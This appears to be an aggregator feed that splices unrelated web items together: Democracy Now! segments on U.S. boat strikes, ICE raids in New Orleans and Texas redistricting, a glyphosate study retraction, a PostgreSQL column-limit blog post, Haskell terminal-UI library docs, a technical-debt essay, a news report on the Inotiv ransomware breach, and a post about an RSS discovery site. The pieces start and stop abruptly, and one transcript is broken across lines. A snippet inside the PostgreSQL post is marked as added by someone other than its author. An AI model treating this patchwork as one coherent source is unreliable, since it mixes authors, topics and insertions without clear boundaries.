The U.S. military said Thursday that it blew up another boat of suspected drug smugglers, this time killing four people in the eastern Pacific. The U.S. has now killed at least 87 people in 22 strikes since September. The U.S. has not provided proof as to the vessels’ activities or the identities of those on board who were targeted, but now the family of a fisherman from Colombia has filed the first legal challenge to the military strikes. In a petition filed with the Inter-American Commission on Human Rights, the family says a strike on September 15 killed 42-year-old Alejandro Andres Carranza Medina, a fisherman from Santa Marta and father of four. His family says he was fishing for tuna and marlin off Colombia’s Caribbean coast when his boat was bombed, and was not smuggling drugs.
“Alejandro was murdered,” says international human rights attorney Dan Kovalik, who filed the legal petition on behalf of the family. “This is not how a civilized nation should act, just murdering people on the high seas without proof, without trial.”
Influential study on glyphosate safety retracted 25 years after publication
A 2000 study that concluded the well-known herbicide glyphosate was safe, widely cited since then, has just been officially disavowed by the journal that published it. The scientists are suspected of having signed a text actually prepared by Monsanto.
A quarter-century after its publication, one of the most influential research articles on the potential carcinogenicity of glyphosate has been retracted for "several critical issues that are considered to undermine the academic integrity of this article and its conclusions." In a retraction notice dated Friday, November 28, the journal
Regulatory Toxicology and Pharmacology
announced that the study, published in April 2000 and concluding the herbicide was safe, has been removed from its archives. The disavowal comes 25 years after publication and eight years after thousands of internal Monsanto documents were made public during US court proceedings (the "Monsanto Papers"), revealing that the actual authors of the article were not the listed scientists – Gary M. Williams (New York Medical College), Robert Kroes (Ritox, Utrecht University, Netherlands), and Ian C. Munro (Intertek Cantox, Canada) – but rather Monsanto employees.
Known as "ghostwriting," this practice is considered a form of scientific fraud. It involves companies paying researchers to sign their names to research articles they did not write. The motivation is clear: When a study supports the safety of a pesticide or drug, it appears far more credible if not authored by scientists employed by the company marketing the product.
Trump Calls Somali Community "Garbage": Minnesota Responds to Racist Rant and Immigration Sweeps
Democracy Now!
www.democracynow.org
2025-12-05 13:35:00
Federal authorities are carrying out intensified operations this week in Minnesota as President Donald Trump escalates his attacks on the Somali community in the state. The administration halted green card and citizenship applications from Somalis and people from 18 other countries after last week...
Federal authorities are carrying out intensified operations this week in Minnesota as President Donald Trump escalates his attacks on the Somali community in the state. The administration halted green card and citizenship applications from Somalis and people from 18 other countries after last week’s fatal shooting near the White House. During a recent Cabinet meeting, Trump went on a racist tirade against the Somali community, saying, “We don’t want them in our country,” and referring to Somali immigrants as “garbage.” Minnesota has the largest Somali community in the United States, and the vast majority of the estimated 80,000 residents in the state are American citizens or legal permanent residents.
“We have seen vile things that the president has said, but in these moments, we need to come together and respond,” says Jaylani Hussein, the executive director of
CAIR
-Minnesota. He also highlights the connections between Trump’s targeting of the community and foreign policy. “If you demonize Muslims, then you can get away with killing Muslims abroad. This has always been the case, from the Afghanistan War to the Iraq War.”
The 1600 columns limit in PostgreSQL - how many columns fit into a table
Quick recap: in OLTP, the aim is (usually) to use the 3rd normal form. In OLAP, tables are often only vaguely normalized, and wide or very wide fact tables in 2nd normal form are quite common. But are 1600 columns a bad idea? Yes. Do some applications generate such wide tables? Also yes. I’ve seen my fair share of customer requests and support tickets asking if the 1600 columns limit can be raised or even lifted.
But is that possible?
Why is there a limit
In PostgreSQL, a single row must fit into a single page on disk. The disk page size, by default, is 8 kB. As Frédéric shows in tests in his blog post, sometimes even a smaller number of columns does not fit into the page.
Now my analytics background is not only with PostgreSQL, but also with WarehousePG (a Greenplum fork) and with Greenplum itself. In WarehousePG the default page size is 32 kB. Will this increase the number of columns? Unfortunately not: the fork is still using the same values for MaxTupleAttributeNumber and MaxHeapAttributeNumber, limited to 1600 columns. There’s also a comment near MaxHeapAttributeNumber in src/include/access/htup_details.h:
 * In any case, depending on column data types you will likely be running
 * into the disk-block-based limit on overall tuple size if you have more
 * than a thousand or so columns. TOAST won't help.
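To see the 1600-column limit in action, here is a small sketch of my own (not from the original post) that writes out a CREATE TABLE statement with one column too many; feeding the generated DDL to a stock PostgreSQL server is expected to fail with an error along the lines of "tables can have at most 1600 columns". The table and column names are placeholders.

# Generate DDL for a table with one more column than PostgreSQL allows.
# Running the resulting file with psql against a stock server is expected
# to fail because it exceeds the 1600-column limit (MaxHeapAttributeNumber).
NUM_COLS = 1601  # one past the documented limit

columns = ",\n  ".join(f"c{i} boolean" for i in range(NUM_COLS))
ddl = f"CREATE TABLE too_wide (\n  {columns}\n);\n"

with open("too_wide.sql", "w") as fh:
    fh.write(ddl)

print(f"Wrote too_wide.sql with {NUM_COLS} columns; run it with psql to see the error.")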
Is it possible to increase the limit
It is possible to increase these limits, and create tables with a couple thousand columns. Theoretically, a single page fits 8136 single byte columns (like a BOOLEAN) in PostgreSQL. In WarehousePG this even fits 32712 single byte columns. But that is not the real limit.
The HeapTupleHeader has the t_infomask2 field, which is a uint16 (unsigned integer), defined in access/htup_details.h. Out of the available bits, 11 are used for the number of attributes:

#define HEAP_NATTS_MASK 0x07FF /* 11 bits for number of attributes */
And 11 bits is 2047 attributes. Any tuple can have a maximum of 2047 attributes, even with all the 1600 safeguards increased or removed. In practice, it’s 2041 attributes. When inserting into or updating a table, the database will not write more than those 2041 columns; all other columns are not set. If the column definition of the higher columns is NOT NULL, the INSERT or UPDATE fails with a constraint violation. Otherwise the higher columns are simply set to NULL.
Bottom line: while the table can have many more columns, the database can’t write anything into these additional columns. Not without fully refactoring the way tuples are created internally.
Conclusion
In theory it is possible to raise the 1600 columns limit to a slightly larger number. In practice it is not worth the small gain, and it pushes against internal safety boundaries built into the database.
In practice this will also have all kinds of mostly unintended side effects and problems. This is untested territory, and all unit tests must be updated as well. Tools like psql have a built-in limitation too, which also must be raised. This in turn requires always using the patched binary; it might no longer be possible to use a "standard" psql against this database. Other tools might have problems with very wide tables as well.
Exporting the data is possible, but the table can no longer be imported into an unpatched version of the database. This basically creates a fork of a fork, which must be maintained and updated for every new minor and major version.
tl;dr: Don’t do this.
Thank you
Thanks to
Robert Haas
for reviewing the code assumptions about larger number of columns.
┌─────────┬─────┬─────────┐
│ Name │ Age │ City │
├─────────┼─────┼─────────┤
│ Alice │ 30 │ New York│
│ Bob │ 25 │ │
│ Charlie │ 35 │ London │
└─────────┴─────┴─────────┘
Unordered Lists: ul
Clean unordered lists with automatic nesting:
ul ["Feature A", "Feature B", "Feature C"]
• Feature A
• Feature B
• Feature C
Nested lists with auto-styling:
ul [ "Backend"
, ul ["API", "Database"]
, "Frontend"
, ul ["Components", ul ["Header", ul ["Footer"]]]
]
Increment the frame number on each render to animate:
-- In your app state, track a frame counter
data AppState = AppState { spinnerFrame :: Int, ... }
-- In your view function
spinner "Loading" (spinnerFrame state) SpinnerDots
-- In your update function (triggered by a tick or key press)
state { spinnerFrame = spinnerFrame state + 1 }
layout[
withColor ColorRed $ text "The quick brown fox...",
withColor ColorBrightCyan $ text "The quick brown fox...",
underlineColored "~" ColorRed $ text "The quick brown fox...",
margin "[INFO]" [withColor ColorCyan $ text "The quick brown fox..."]
]
let palette = tightRow $ map (\i -> withColor (ColorFull i) $ text "█") [16, 19..205]
redToBlue = tightRow $ map (\i -> withColor (ColorTrue i 100 (255 - i)) $ text "█") [0, 4..255]
greenFade = tightRow $ map (\i -> withColor (ColorTrue 0 (255 - i) i) $ text "█") [0, 4..255]
rainbow = tightRow $ map colorBlock [0, 4..255]
where
colorBlock i =
let r = if i < 128 then i * 2 else 255
g = if i < 128 then 255 else (255 - i) * 2
b = if i > 128 then (i - 128) * 2 else 0
in withColor (ColorTrue r g b) $ text "█"
putStrLn $ render $ layout [palette, redToBlue, greenFade, rainbow]
Styles (ANSI Support)
Add ANSI styles to any element:
layout[
withStyle StyleBold $ text "The quick brown fox...",
withColor ColorRed $ withStyle StyleBold $ text "The quick brown fox...",
withStyle StyleReverse $ withStyle StyleItalic $ text "The quick brown fox..."
]
layout[
withStyle (StyleBold <> StyleItalic <> StyleUnderline) $ text "The quick brown fox...",
withStyle (StyleBold <> StyleReverse) $ text "The quick brown fox..."
]
You can also combine colors and styles:
withColor ColorBrightYellow $ withStyle (StyleBold <> StyleItalic) $ text "The quick brown fox..."
Custom Components
Create your own components by implementing the Element typeclass:
import Layoutz
import Data.List (intercalate)

data Square = Square Int
instance Element Square where
renderElement (Square size)
| size < 2 = ""
| otherwise = intercalate "\n" (top : middle ++ [bottom])
where
w = size * 2 - 2
top = "┌" ++ replicate w '─' ++ "┐"
middle = replicate (size - 2) ("│" ++ replicate w ' ' ++ "│")
bottom = "└" ++ replicate w '─' ++ "┘"
-- Helper to avoid wrapping with L
square :: Int -> L
square n = L (Square n)
-- Use it like any other element
putStrLn $ render $ row
[ square 3
, square 5
, square 7
]
Command thread - Executes Cmd side effects async, feeds results back
As per the above, commands run without blocking the UI. Press ESC to exit.
LayoutzApp state msg
data LayoutzApp state msg = LayoutzApp
{ appInit :: (state, Cmd msg) -- Initial state + startup command
, appUpdate :: msg -> state -> (state, Cmd msg) -- Pure state transitions
, appSubscriptions :: state -> Sub msg -- Event sources
, appView :: state -> L -- Render to UI
}
Subscriptions

Subscription                    Description
onKeyPress (Key -> Maybe msg)   Keyboard input
onTick msg                      Periodic ticks (~100ms) for animations
batch [sub1, sub2, ...]         Combine subscriptions
Commands

Command                       Description
None                          No effect
Cmd (IO (Maybe msg))          Run IO, optionally produce message
Batch [cmd1, cmd2, ...]       Multiple commands
cmd :: IO () -> Cmd msg       Fire and forget
cmdMsg :: IO msg -> Cmd msg   IO that returns a message
Example: Logger with file I/O
import Layoutz
data Msg = Log | Saved
data State = State { count :: Int, status :: String }
loggerApp :: LayoutzApp State Msg
loggerApp = LayoutzApp
{ appInit = (State 0 "Ready", None)
, appUpdate = \msg s -> case msg of
Log -> (s { count = count s + 1 },
cmd $ appendFile "log.txt" ("Entry " <> show (count s) <> "\n"))
Saved -> (s { status = "Saved!" }, None)
, appSubscriptions = \_ -> onKeyPress $ \key -> case key of
CharKey 'l' -> Just Log
_ -> Nothing
, appView = \s -> layout
[ section "Logger" [text $ "Entries: " <> show (count s)]
, text (status s)
, ul ["'l' to log", "ESC to quit"]
]
}
main = runApp loggerApp
5,000 Arrests? ICE Descends on Louisiana to Carry Out Raids in World's "Incarceration Capital"
Democracy Now!
www.democracynow.org
2025-12-05 13:24:43
A major immigration crackdown is underway in New Orleans and the surrounding areas of Louisiana, dubbed “Operation Catahoula Crunch” by the Trump administration. According to planning documents, 250 federal agents will aim to make 5,000 arrests over two months. Homeland Security Secretar...
This is a rush transcript. Copy may not be in its final form.
AMY GOODMAN: This is Democracy Now!, democracynow.org, The War and Peace Report. I’m Amy Goodman.
We turn now to New Orleans and southeast Louisiana, where more than 250 federal immigration agents launched Operation Catahoula Crunch this week. They reportedly aim to make more than 5,000 arrests over two months.
Homeland Security Secretary Kristi Noem says the operation will target, quote, “the worst of the worst,” unquote. But local officials say they’re skeptical. City Councilmember Lesli Harris responded, quote, “There are nowhere near 5,000 violent offenders in our region. … What we’re seeing instead are mothers, teenagers, and workers being detained during routine check-ins, from their homes and places of work.” So far, agents have targeted the parking lots of home improvement stores like Home Depot and workers at construction sites.
At a New Orleans City Council hearing Thursday, about 30 protesters were removed after demanding city leaders do more to protect immigrants, calling for ICE-free zones. In a public comment session, residents went to the microphone one by one and were cut off when it was clear they wanted to talk about immigration, which was not on the formal agenda. This is Mich González of SouthEast Dignity Not Detention Coalition. After his mic was cut, he continued to try to be heard.
MICH GONZÁLEZ: We delivered a letter to City Council on November 21st. I’m part of the SouthEast Dignity Not Detention Coalition, and we requested a meeting. This should be on the agenda. It should be on the agenda.
CHAIR: Not germane.
MICH GONZÁLEZ: Public safety is at the heart —
Little kids are not going to school right now. People are not able to take their disabled parents to their medical appointments. … Please, I’m begging you.
PROTESTERS: Shame! Shame!
MICH GONZÁLEZ: And right now it’s about the safety of the people who live here. But I promise you, in just — these people are planning to stay here for two months and take as many as 5,000 of the people who live in this great city of New Orleans.
PROTESTERS: Shame! Shame!
MICH GONZÁLEZ: And they are the people who work here. They’re the people who clean dishes here. They’re the people who take care of the elderly in the nursing homes. … Please, I’m begging you.
AMY GOODMAN: For more, we’re joined by Homero López, legal director for ISLA, Immigrant Services and Legal Advocacy, based in New Orleans.
Welcome to Democracy Now!, Homero. If you can start off by talking about what exactly you understand this plan is? As they move in 250 immigration agents, they say they’re making 5,000 arrests in the next two months. What’s happening to New Orleans?
HOMERO LÓPEZ: Yes. Thank you, Amy, for having me on.
We have seen the officers come into the city and the surrounding areas, as well. And the fact that they’re looking for a specific quota, that they have a number that they’re going after, makes it clear that they’re not targeting, as they claim, the worst of the worst. Instead, they’re going to target whoever they can, and as the Supreme Court has unfortunately authorized them, they’re using racial profiling as part of that approach.
AMY GOODMAN: They’re calling it “Catahoula Crunch.” Louisiana’s state dog is the Catahoula. Explain what they’re saying here, what Kristi Noem is talking about, who the immigrants are that they’re going after.
HOMERO LÓPEZ: Yeah. They originally had called it the “Swamp Sweep,” but I guess they thought “SS” was a little bit too on the nose, so they went after “Catahoula Crunch” instead.
And what they’re saying is they’re going to target, you know, folks who have criminal backgrounds, or at least that’s the purported position from the higher-ups at least. There was a video of Bovino recently saying he’s going after immigrants. He was asked, “Who are you targeting? What are you — who are you looking for?” And he said, “This is an immigration raid.” And so, he’s — they’re focusing on immigrants across the board.
What we’ve seen has been folks at work, folks at their check-ins, people around schools, with ICE or CBP officers setting up around the schools. And the fear that’s being sowed in the community is really the true intent of their operation here.
AMY GOODMAN: Catahoula Crunch, named after the Louisiana state dog. Didn’t Homeland Security Secretary Kristi Noem famously shoot her dog?
HOMERO LÓPEZ: That is a story that’s come out, yes.
AMY
GOODMAN
:
Many
ICE
officials who now work at the national level came up through Louisiana. Is that right? Can you talk about them? And who are the hundreds of agents moved in to do these arrests?
HOMERO
LÓPEZ:
Yeah, Louisiana is playing a oversized role when it comes to immigration enforcement throughout the country. The former wildlife and fisheries secretary here in Louisiana is now one of the deputy — or, is the deputy director of
ICE
nationally. Our former area, New Orleans,
ICE
director, field office director, is also at headquarters. There are various deportation officers here from Louisiana who have gone to work at headquarters. And so, the approach that they used to take or that they have taken in Louisiana since 2014 to incarcerate as many people as possible, quickly warehouse and deport people from the state, is something that seems to be the structure that is being operated now from the national headquarters.
AMY GOODMAN: Louisiana is known in other parts of the country particularly when it comes to detention. You have Mahmoud Khalil, the Columbia student who was imprisoned in Louisiana. You have Rümeysa Öztürk, the Tufts graduate student who was imprisoned in Louisiana. Talk about the overall detention complex in Louisiana.
HOMERO LÓPEZ: Louisiana has a history, a terrible history, of being the incarceration capital of the world. And that is no different now when it comes to immigration detention. Louisiana is the state with the second-largest detained immigrant population in the country, next to Texas. However, we’re not a border state. We also don’t have a large immigrant population by numbers. Instead, what Louisiana does is receive a lot of people who are detained around the country.
And so, the additional aspect of what happens in Louisiana is that we have these very rural, isolated detention centers in central Louisiana, central and northern Louisiana, which are very far away from major metropolitan or from major population centers, which means what you end up with is people removed from their legal and support systems. So, when you had someone like Mahmoud Khalil being moved down here from New York, what you had was removing him from his social network, from people who could assist him, from being able to provide him with assistance. Same thing with Rümeysa Öztürk. And these were highly publicized cases, places where folks had large support networks. And so, when we deal with folks who don’t have those support networks, who don’t have that publicity, who don’t have that kind of support, and you have them in such a remote, isolated area, what you end up is basically warehousing folks without giving them an opportunity to fight their case and be able to present a viable case through actual due process.
AMY GOODMAN: You can’t help but notice that New Orleans is a blue city in a red state, Louisiana. Louisiana has the most detention beds outside of Texas. Can you talk about the consent decree that was overturned last month, Homero?
HOMERO LÓPEZ: The consent decree was overturned last month; the Justice Department wanted to get rid of it. It had been in place for over a decade here in New Orleans, and it had not allowed the local sheriff’s office to cooperate with ICE.
Now the new sheriff, we don’t know exactly what she’s going to do, but what it does is it removes this tool that existed, which was originally implemented because of previous abuses, that had been determined by a federal court, that New Orleans police, New Orleans Sheriff’s Office should not be cooperating, and had ordered the sheriff’s office not to cooperate. Without that consent decree in place, it’s now up to the sheriff. And so, there is a movement on the ground from advocacy groups and from other organizers to push the sheriff to continue to have that kind of policy, but we’ll see what comes from that.
AMY GOODMAN: And can you talk about the people you represent? I mean, I think it’s really important, not only in New Orleans, but around the country. A number of the people being picked up are going to their court hearings. They are following the rules, and they end up being arrested.
HOMERO LÓPEZ: Yeah, the majority of people who are being arrested, the majority of calls that we’re receiving, are from folks who are going through the process, whether they be children who originally applied through the Special Immigrant Juvenile status process and are awaiting their ability to apply for residency, whether it’s spouses of U.S. citizens who are going to their interviews and are being picked up, or whether it’s people who have immigration court hearings, have filed their applications and are attending them. Again, they’re doing it, quote-unquote, “the right way.” And that’s who is being picked up. Those are the folks who are the low-hanging fruit. Those are the folks who are going to be targeted.
There’s a reason that these officers are going to worksites and not necessarily doing in-depth investigations to identify folks that they claim are a danger to the community. Instead, what they’re doing is they’re taking folks out of our community: our neighbors, our friends, our family members. And that’s who they’re detaining and they’re sending into these terrible detention centers in order to try to quickly deport them from the country.
AMY GOODMAN: Homero López, I want to thank you for being with us. Do you have a final comment on the City Council hearing that was held yesterday, as mics were turned off on person after person who was calling for ICE-free zones?
HOMERO LÓPEZ: Yeah, we hope that City Council will take a stance. We understand that they don’t necessarily have a ton of power over federal actions, but the point here is about the values that the city stands for and what we are going to demonstrate to our community and to our residents: who we support, what we support and what we stand for in the city.
AMY GOODMAN: Homero López is the legal director of ISLA, the Immigration Services and Legal Advocacy, based in New Orleans, Louisiana.
The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
The conservative majority on the U.S. Supreme Court has cleared the way for Texas to use a gerrymandered congressional map in next year’s midterm elections that a lower court found racially discriminatory. The 6-3 ruling is another political win for President Donald Trump and his allies, who h...
This is a rush transcript. Copy may not be in its final form.
AMY GOODMAN: A major victory for President Trump: The Supreme Court has cleared the way for Texas to use a new congressional map designed to help Republicans pick up as many as five House seats in next year’s midterms. A lower court previously ruled the redistricting map was unconstitutional because it had been racially gerrymandered and would likely dilute the political power of Black and Latino voters.
Supreme Court Justice Elena Kagan wrote in her dissent, quote, “This court’s stay ensures that many Texas citizens, for no good reason, will be placed in electoral districts because of their race. And that result, as this court has pronounced year in and year out, is a violation of the constitution,” Justice Kagan wrote.
For more, we’re joined by Ari Berman, voting rights correspondent for Mother Jones magazine. His new piece is headlined “The Roberts Court Just Helped Trump Rig the Midterms.” Ari is the author of Minority Rule: The Right-Wing Attack on the Will of the People — and the Fight to Resist It.
Ari Berman, welcome back to Democracy Now! Talk about the significance of this Supreme Court decision yesterday. And what exactly was Samuel Alito’s role?
ARI BERMAN: Good morning, Amy, and thank you for having me back on the show.
So, the immediate effect is that Texas will now be able to use a congressional map that has already been found to be racially gerrymandered and could allow Republicans to pick up five new seats in the midterms. And remember, Texas started this whole gerrymandering arms race, where state after state is now redrawing their maps ahead of the midterms, essentially normalizing something that is deeply abnormal.
It was an unsigned majority opinion, but Samuel Alito wrote a concurrence, basically saying that the Texas map was a partisan map, pure and simple. And remember, Amy, the Supreme Court has already laid the groundwork for Texas to do this kind of thing by essentially saying that partisan gerrymandering cannot be reviewed in federal court, no matter how egregious it is. They have blocked racial gerrymandering in the past, but now, essentially, what they’re allowing to do is they’re allowing Texas to camouflage a racial gerrymander as a partisan gerrymander, and they’ve given President Trump a huge victory in his war against American democracy.
AMY GOODMAN: This overturned a lower court ruling. What is the role of the courts now, with the Supreme Court ruling again and again on this?
ARI BERMAN: Well, basically, what the Supreme Court has done is it’s given President Trump the power of a king, and it’s given itself the power of a monarchy, because what happens is lower courts keep striking down things that President Trump and his party do, including Trump appointees to the lower courts — the Texas redistricting map was struck down by a Trump appointee, who found that it was racially gerrymandered to discriminate against Black and Latino voters. What the Roberts Court did was overturn that lower court opinion, just as it’s overturned so many other lower court opinions to rule in favor of Donald Trump and his party.
And one of the most staggering things, Amy, is the fact that the Roberts Court has ruled for President Trump 90% of the time in these shadow docket cases. So, in all of these big issues, whether it’s on voting rights or immigration or presidential powers, lower courts are constraining the president, and the Supreme Court repeatedly is saying that the president and his party are essentially above the law.
AMY GOODMAN: So, you have talked about the Supreme Court ruling in a case in 2019 that ordered courts to stay out of disputes over partisan gerrymandering. Tell us more about that.
ARI BERMAN: It was really a catastrophic ruling for democracy, because what it said is that no matter how egregiously a state gerrymanders to try to target a political party, those claims not only can’t be struck down in federal court, they can’t even be reviewed in federal court. And what that has done is it has said to the Texases of the world, “You can gerrymander as much as you want, as long as you say that you’re doing it for partisan purposes.”
So, this whole exercise made a complete mockery of democracy, because Texas goes out there and says, “We freely admit that we are drawing these districts to pick up five new Republican seats.” President Trump says, “We’re entitled to five new seats.” Now, that would strike the average American as absurd, the idea that you could just redraw maps mid-decade to give more seats to your party. But the Supreme Court has basically laid the groundwork for that to be OK.
And even though racial gerrymandering, discriminating against Black and Hispanic voters, for example, is unconstitutional, which is what the lower court found in Texas, the Roberts Court continually has allowed Republicans to get away with this kind of racial gerrymandering by allowing them to just claim that it’s partisan gerrymandering. And that’s what happened once again in Texas yesterday.
AMY GOODMAN: Where does this leave the Voting Rights Act? And for people, especially young people who, you know, weren’t alive in 1965, explain what it says and its importance then.
ARI BERMAN: The Voting Rights Act is the most important piece of civil rights legislation ever passed by Congress. It quite literally ended the Jim Crow regime in the South by getting rid of the literacy tests and the poll taxes and all the other suppressive devices that had prevented Black people from being able to register and vote in the South for so many years.
It has been repeatedly gutted by the Roberts Court, which has ruled that states with a long history of discrimination, like Texas, no longer have to approve their voting changes with the federal government. The Roberts Court has made it much harder to strike down laws that discriminate against voters of color. And now they are preparing potentially to gut protections that protect people of color from being able to elect candidates of choice.
And I think the Texas ruling is a bad sign, another bad sign, for the Voting Rights Act, because a lower court found that Texas drew these maps to discriminate against Black and Latino voters, that they specifically targeted districts where Black and Latino voters had elected their candidates of choice. And the Supreme Court said, “No, we’re OK with doing it.” So it was yet another example in which the Supreme Court is choosing to protect white power over the power of Black, Latino, Asian American voters.
AMY GOODMAN: So, where does this leave the other cases? You have California’s Prop 50 to redraw the state’s congressional districts, but that was done another way. It was done by a referendum; the people of California voted on it. And then you’ve got North Carolina. You’ve got Missouri. Where does this leave everything before next year’s midterm elections?
ARI BERMAN: Yeah, there’s a lot of activity in the courts so far. A federal court has already upheld North Carolina’s map, which was specifically drawn to dismantle the district of a Black Democrat there. The only district they changed was held by a Black Democrat in the state. In Missouri right now, organizers are trying to get signatures for a referendum to block that map, which also targeted the district of a Black Democrat, Emanuel Cleaver.
California’s law is being challenged by Republicans and by the Justice Department. The Supreme Court did signal, however, in its decision in Texas that they believe that the California map was also a partisan gerrymander, so that that would lead one to believe that if the Supreme Court is going to uphold the Texas map, they would also uphold the California map.
And we’ve also seen repeatedly that there’s double standards for this court, that they allow Republicans to get away with things that they don’t allow Democrats to get away with. They’ve allowed Trump to get away with things that they did not allow Biden to get away with. But generally speaking, it seems like the Supreme Court is going to allow states to gerrymander as much as they want. And that’s going to lead to a situation where American democracy is going to become more rigged and less fair.
AMY GOODMAN: Ari Berman, voting rights correspondent for Mother Jones magazine, author of Minority Rule: The Right-Wing Attack on the Will of the People — and the Fight to Resist It. We’ll link to your piece, “The Roberts Court Just Helped Trump Rig the Midterms.”
Next up, immigration crackdowns continue nationwide. We’ll go to New Orleans, where agents are expected to make 5,000 arrests, and to Minneapolis, as Trump escalates his attacks on the Somali community there, calling the whole community “garbage.” Stay with us.
[break]
AMY GOODMAN: “Ounadikom,” “I Call Out to You,” composed by Ahmad Kaabour at the outbreak of the Lebanese Civil War in 1975 and performed at a Gaza benefit concert on Wednesday by the NYC Palestinian Youth Choir.
The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Show HN: Pbnj – A minimal, self-hosted pastebin you can deploy in 60 seconds
Most Technical Problems Are Really People Problems
I once worked at a company which had an enormous amount of technical debt - millions of lines of code, no unit tests, based on frameworks that were well over a decade out of date. On one specific project, we had a market need to get some Windows-only modules running on Linux, and rather than cross-compiling, another team had simply copied & pasted a few hundred thousand lines of code, swapping Windows-specific components for Linux-specific.
For the non-technical reader, this is an enormous problem because now two versions of the code exist. So, all features & bug fixes must be solved in two separate codebases that will grow apart over time. When I heard about this, a young & naive version of me set out to fix the situation....
Tech debt projects are always a hard sell to management, because even if everything goes flawlessly, the code just does roughly what it did before.
This project was no exception, and the optics weren't great. I did as many engineers do and "ignored the politics", put my head down, and got it done. But, the project went long, and I lost a lot of clout in the process.
I realized I was essentially trying to solve a people problem with a technical solution. Most of the developers at this company were happy doing the same thing today that they did yesterday...and five years ago. As Andrew Harmel-Law points out, code tends to follow the personalities of the people that wrote it. The code was calcified because the developers were also. Personality types who dislike change tend not to design their code with future change in mind.
Most technical problems are really people problems.
Think about it. Why does technical debt exist? Because requirements weren't properly clarified before work began. Because a salesperson promised an unrealistic deadline to a customer. Because a developer chose an outdated technology because it was comfortable. Because management was too reactive and cancelled a project mid-flight. Because someone's ego wouldn't let them see a better way of doing things.
The core issue with the project was that admitting the need for refactoring was also to admit that the way the company was building software was broken and that individual skillsets were sorely out of date. My small team was trying to fix one module of many, while other developers were writing code as they had been for decades. I had one developer openly tell me, "I don't want to learn anything new." I realized that you'll never clean up tech debt faster than others create it. It is like triage in an emergency room: you must stop the bleeding first, then you can fix whatever is broken.
An Ideal World
The project also disabused me of the engineer's ideal of a world in which engineering problems can be solved in a vacuum - staying out of "politics" and letting the work speak for itself - a world where deadlines don't exist...and let's be honest, neither do customers. This ideal world rarely exists. The vast majority of projects have non-technical stakeholders, and telling them "just trust me; we're working on it" doesn't cut it. I realized that the perception that your team is getting a lot done is just as important as getting a lot done.
Non-technical people do not intuitively understand the level of effort required or the need for tech debt cleanup; it must be communicated effectively by engineering - in both initial estimates & project updates. Unless leadership has an engineering background, the value of the technical debt work likely needs to be quantified and shown as business value.
Heads Up
Perhaps these are the lessons that prep one for more senior positions. In my opinion, anyone above senior engineer level needs to know how to collaborate cross-functionally, regardless of whether they choose a technical or management track. Schools teach Computer Science, not navigating personalities, egos, and personal blindspots.
I have worked with some incredible engineers, better than myself - the type that have deep technical knowledge on just about any technology you bring up. When I was younger, I wanted to be that engineer - the "engineer's engineer". But I realize now, that is not my personality. I'm too ADD for that. :)
For all of their (considerable) strengths, more often than not, those engineers shy away from the interpersonal. The tragedy is that they are incredibly productive ICs, but may fail with bigger initiatives because they are only one person - a single processor core can only go so fast. Perhaps equally valuable is the "heads up coder" - the person who is deeply technical, but also able to pick their head up & see project risks coming (technical & otherwise) and steer the team around them.
Pharma firm Inotiv discloses data breach after ransomware attack
Bleeping Computer
www.bleepingcomputer.com
2025-12-05 13:05:52
American pharmaceutical firm Inotiv is notifying thousands of people that their personal information was stolen in an August 2025 ransomware attack. [...]...
American pharmaceutical firm Inotiv is notifying thousands of people that their personal information was stolen in an August 2025 ransomware attack.
Inotiv is an Indiana-based contract research organization specializing in drug development, discovery, and safety assessment, as well as live-animal research modeling. The company has about 2,000 employees and an annual revenue exceeding $500 million.
When it disclosed the incident, Inotiv said that the attack had disrupted business operations after some of its networks and systems (including databases and internal applications) were taken down.
Earlier this week, the company revealed in a filing with the U.S. Securities and Exchange Commission (SEC) that it has "restored availability and access" to impacted networks and systems and that it's now sending data breach notifications to 9,542 individuals whose data was stolen in the August ransomware attack.
"Our investigation determined that between approximately August 5-8, 2025, a threat actor gained unauthorized access to Inotiv's systems and may have acquired certain data," it says in letter samples filed with Maine's attorney general.
"Inotiv maintains certain data related to current and former employees of Inotiv and their family members, as well as certain data related to other individuals who have interacted with Inotiv or companies it has acquired."
Inotiv has not yet shared which types of data were stolen during the incident, nor has it attributed the attack to a specific cybercrime operation.
However, the Qilin ransomware group claimed responsibility for the breach in August, leaked data samples allegedly stolen from the company's compromised systems, and said they exfiltrated over 162,000 files totaling 176 GB.
Inotiv entry on Qilin's leak site (BleepingComputer)
An Inotiv spokesperson has not yet responded to BleepingComputer's request for comment regarding the validity of Qilin ransomware's claims.
Qilin surfaced in August 2022 as a Ransomware-as-a-Service (RaaS) operation under the "Agenda" name and has since claimed responsibility for over 300 victims on its dark web leak site.
I don't like RSS readers. I know, this is blasphemous, especially on a website where I'm actively encouraging you to subscribe through RSS. As someone writing stuff, RSS is great for me. I don't have to think about it, the requests are pretty lightweight, and I don't need to think about your personal data or what client you are using. So as a protocol, RSS is great, no notes.
However, as something I'm going to consume, it's frankly a giant chore. I feel pressured by RSS readers, where there is this endlessly growing backlog of things I haven't read. I rarely want to read all of a website's content from beginning to end; instead I like to jump between sites. I also don't really care if the content is chronological: an old post about something interesting isn't less compelling to me than a newer post.
What I want, as a user experience, is something akin to TikTok. The whole appeal of TikTok, for those who haven't wasted hours of their lives on it, is that I get served content based on an algorithm that determines what I might think is useful or fun. However what I would like is to go through content from random small websites. I want to sit somewhere and passively consume random small creators' content, then upvote some of that content, and the service should show that content more often to other users. That's it. No advertising, no collecting tons of user data about me, just a very simple "I have 15 minutes to kill before the next meeting, show me some random stuff."
In this case the "algorithm" is pretty simple: if more people like a thing, more people see it. But with Google on its way to replacing search results with LLM generated content, I just wanted to have something that let me play around with the small web the way that I used to.
There actually used to be a service like this called StumbleUpon which was more focused on pushing users towards popular sites. It has been taken down, presumably because there was no money in a browser plugin that sent users to other websites whose advertising you didn't control.
So I wanted to do something pretty basic. You hit a button, get served a new website. If you like the website, upvote it, otherwise downvote it. If you think it has objectionable content then hit report. You have to make an account (because I couldn't think of another way to do it) and then if you submit links and other people like it, you climb a Leaderboard.
On the backend I want to (very slowly so I don't cost anyone a bunch of money) crawl a bunch of RSS feeds, stick the pages in a database and then serve them up to users. Then I want to track what sites get upvotes and return those more often to other users so that "high quality" content shows up more often. "High quality" would be defined by the community or just me if I'm the only user.
